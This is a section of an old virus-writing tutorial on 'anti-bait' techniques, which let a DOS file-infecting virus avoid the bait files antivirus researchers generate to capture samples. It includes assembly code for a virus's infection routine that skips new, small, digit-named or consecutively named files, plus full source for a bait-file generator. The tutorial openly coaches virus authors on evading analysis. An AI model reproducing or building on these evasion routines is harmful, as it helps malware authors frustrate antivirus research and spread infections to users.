Anti-Bait Technique ~~~~~~~~~~~~~~~~~~~ -HATE-YOUR-ENEMIES- By using the methods explained in the previous section, we can safely say that the AV can not simply set the bait maker to generate 10,000 bait files, with the virus in memory, and get an accurate and complete of what is necessary. Instead they must use many varying files, reboot the system thousands of times to change the date, and fiddle with the generation counter, which will significantly slow things down. But let us take things a step further: let us imagine that the virus won't even infect the files in the first place. This would simply involve putting the candidate file through a number of tests, and if it fails any of them, saying the file could be a bait, and not infecting them. This section simply looks at what some of these test could entail. Anti-Bait Techniques: The Obvious ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The are two very obvious and easy test your virus _SHOULD_ have: 1. It should not infect new files. 2. It should not infect small files. New files should not be infected, as the files created by a bait maker will usually look new. Simply grab the current date, and compare it to the date stamp of the file. It is the same? Well then dont infect! It should be noted that this is easilly defeated, if the bait maker sets the files date stamp to a random date, before closing it. The files created by bait makers, will usually be fairly small, so small files should be avoided. I would recommend that you avoid files smaller then between 5,000 and 10,000 bytes. The smaller you make this limit, the less chance there is that a legitimate file will be wrongly be left uninfected, but it is also more likely that a bad bait file will wrongly be infected. By making the limit larger, the greater the chance there is that a legitimate file will be wrongly be left uninfected, but its also more likely that a bait file will correctly be left uninfected. High limit or Low limit? The choice is yours... This could easilly be defeated if the bait maker created files which were, say, 50,000 bytes. This size is obviously far to large to avoid, as it is larger then many legitimate programs. You should also remember however that 10,240 files at 5,000 bytes will use 52 megabytes, so if the bait files were 50,000 bytes long, this figure would go upto 520 megabytes! Most test computers do not have such lard hard drives, so it is safe to assume that the bait files will be small. As the above two methods are so easy to implement, I will not bother to supply any example code. Anti-Bait Techniques: Avoid Digital File Names ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Most bait makers create filenames like '00000000.com' followed by '00000001.com'. All the file are names composed of the characters '0' to '9'. We could have a check in our virus, to ensure that this is not true, and if it is, not infect the file, as shown below: ------------------------------------------------------------------------ ;This code avoids file names composed entirely of digits. It is assumed ;that the file has already been opened, and that its file handle is in ;BX. get_sft_bx is assumed to be a sub-procedure that returns ES:DI pointing ;to the SFT entry of the handle in BX (the file to be infected). call get_sft_bx mov si,di add si,20 ;File names in at offset 20h of SFT mov cx,8 ;8 characters in name (padded with spaces) cld ;increment SI on LODSB check_name: es:lodsb cmp al,'0' jb name_safe cmp al,'9' ja name_safe ;character is not digit, so it is safe cmp al,20 ;check for space if equal, end of name has je not_safe ;been reached, with only digits encounters. ;which means it is possibly bait. loop check_name ;check next character not_safe: jmp exit_infect ;end of name reached with only digits so ;do not infect name_safe: ------------------------------------------------------------------------ This method could easilly be defeated by using file names like 'AAAAAAAA.COM' instead of '00000000.com'. Anti-Bait Techniques: Avoid Consecutive File Names ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Many people consider this method overkill, but it is extremely effective, if you are serious about your Post-Discovery-Stratagies. It works by checking if the currents file to be infected, has a consecutive file name of the previous filename. For example, if the previous file to be infected was called 'AAAAAAAA.COM' you would not infect the next file if it was called 'AAAAAAAB.COM'. The easiest way to do this, is save the sum of the characters of the file name. If the next file is consecutive to it, the sum will be the sum of the previous one + 1. i.e: 'AAAAAAAA' = 'A' + 'A' + 'A' + 'A' + 'A' + 'A' + 'A' + 'A' = 208h 'AAAAAAAB' = 'A' + 'A' + 'A' + 'A' + 'A' + 'A' + 'A' + 'B' = 209h Therefore, of the filename of your candidate file, and use it to check if the next file to be infected is consecutive. If it is do not infect! Example: ------------------------------------------------------------------------ ;This code avoids infecting files with consecutive filenames. It is assumed ;that the file has already been opened, and that its file handle is in ;BX. get_sft_bx is assumed to be a sub-procedure that returns ES:DI pointing ;to the SFT entry of the handle in BX (the file to be infected). call get_sft_bx mov si,di add si,20 ;File names in at offset 20h of SFT mov cx,8 ;8 characters in name (padded with spaces) cld ;increment SI on LODSB xor bx,bx mov ah,0 check_consecutive: es:lodsb cmp al,20 ;check for space je end_cc ;if space, end of name rached add bx,ax ;add character to sum loop check_consecutive end_cc: mov ax,cs:last_sum ;the sum of the last filename mov cs:last_sum,bx ;save the sum of this file name for next time inc ax cmp ax,bx je dont_infect ------------------------------------------------------------------------ The above code is fairly lengthy, and messy, but it works! You should also not infect a file, if it is the same length as the previous file, for obvious reasons. This code could by defeated by incrementing filename by values other then 1, or even by incrementing it by a RANDOM amount each time. To help you test your Anti-Bait code, I have put together a Bait Generator (Sepultura's Funky Bait Maker), which can be modified to show how each of the above methods are defeated. Here is the complete source: ------------------------------------------------------------------------ ;SFBM.ASM compile with A86 ;This is a bait maker that in its original state, will fail to defeat all ;of the above mentioned techniques. However, by making the modifications ;described through out the code, all of the above techniques will fail ;miserably. ;By changing the Below EQUates, and (un)commenting certain code below, you ;can test the various technique described above, as well as any other Anti- ;Bait Technique you think off.. number_of_files equ 200 ;number of bait files to genrate file_length equ 5000 ;length of bait file. Change this to ;catchout virii that do not infect ;small files. (minimum 38, maximum ;65,279). first_character equ '0' ;Changing these two equates to 'A' to last_character equ '9' ;'Z' will fool virii that check if ;the filename is entirely numbers.. character_range equ (last_character - first_character)+1 ;This is used ;to calculate the ;filename.. radix 16 org 100 mov ds,cs mov ah,9 mov dx,offset gen_msg ;prints intro message.. int 21 mov cx,number_of_files ;200 bait files file_loop: push cx mov dx,offset filename xor cx,cx mov ax,3c02 ;CREATE/TRUNCATE "filename" int 21 mov bx,ax ;BX = Handle. I used a MOV, so ;AH stays = to 0 mov dx,offset bait mov cx,file_length ;file is 5000 bytes long ;Uncomment the IN, and ADD below, so the length of the bait becomes ;between FILE_LENGTH and (FILE_LENGTH + 255). This is to catchout ;virii that wont infect a file if its the same size as the last file. ;in al,40 ;add cx,ax mov ah,40 ;Write Bait Program to file.. int 21 ;Uncommenting the below CALL, will cause SFBM to set each file ;to a random date, before closing, avoiding virii which dont ;infect new files. ;call set_date pop cx mov ah,3e ;Closes the file.. int 21 push ds mov ax,4b00 ;This calls a execute of "filename" ;i have set up no parameter tables, ;so it will not actually execute, but ;the virus will intercept and infect. mov dx,offset filename int 21 pop ds mov ah,9 mov dx,offset done ;prints: int 21 ;DONE: XXXXXXXX.COM std mov si,offset units mov di,si next_character: mov dl,1 ;Add 1 to file name characters. ;(00000000 -> 00000001) etc.. ;Uncommenting the code below, will cause SFBM to add between ;2 and 5 to the file name characters. This will avoid virii that ;check for consecutive file names, as they are not incrementing by ;1 each time. ;cmp si,offset units ;Are we modifying a character other? ;jne not_unit ;If not, only add 1 to the character ;in al,40 ;and al,3 ;Choose amount between 2 and 5 to ;add dl,al ;add.. ;inc dx not_unit: lodsb add al,dl ;Calculate Next File Name (increment) cmp al,last_character + 1 ;Has it overflowed past jb no_more_increase ;last_character? If not continue.. sub al,character_range ;else bring it back into range, ds:stosb jmp short next_character ;increment next char, and check for ;overflow... no_more_increase: ds:stosb loop file_loop ;Do Next File (CX times) mov ah,4c int 21 set_date: ;Sub Procedure gives file random Date & Time. in ax,40 ;calculates the Year for Date stamp and ax,0f xchg dx,ax shl dx,9 get_month: ;calculates the Month for Date stamp in ax,40 and ax,0f cmp ax,0c ja get_month or ax,ax jz get_month shl ax,5 or dx,ax get_date: ;calculates the Day of Month for Date stamp in ax,40 and ax,1f or ax,ax jz get_date or dx,ax ;DX = DATE get_secs: ;calculates seconds of the Time Stamp in ax,40 and ax,1f cmp ax,1d ja get_secs xchg cx,ax get_minuits: ;calculates minuits of the Time Stamp in ax,40 and ax,3f cmp ax,3b ja get_minuits shl ax,5 or cx,ax get_hours: ;calculates hours of the Time Stamp in ax,40 and ax,1f cmp ax,17 ja get_hours shl ax,0b or cx,ax ;CX = TIME mov ax,5701 ;set DATE/TIME stamp int 21 ret gen_msg db "- Sepulturas Funky Bait Maker -",0a,0d db "Generating Funky Bait Files...",0a,0d,"$" done db "DONE: " filename db 7 dup (first_character) units db first_character db ".COM" db 0,0d db "$" ;This is the .COM program that will be at the start of each Bait file. ;It is 38 bytes long. The rest of the file will just be padded with ;garbage from memory. bait: call bait_b db 'Sepulturas Funky Bait File!$' bait_b: pop dx ;DX = offset of bait message mov ah,9 int 21 ;print message int 20 ;exit ;END SFBM.ASM ------------------------------------------------------------------------ The above Bait Maker can be very useful, to test your Anti-Bait techniques. It is also quite useful, for its orginal purpose - analysing virii. Use it for either - AV - VX - they're all the same to me.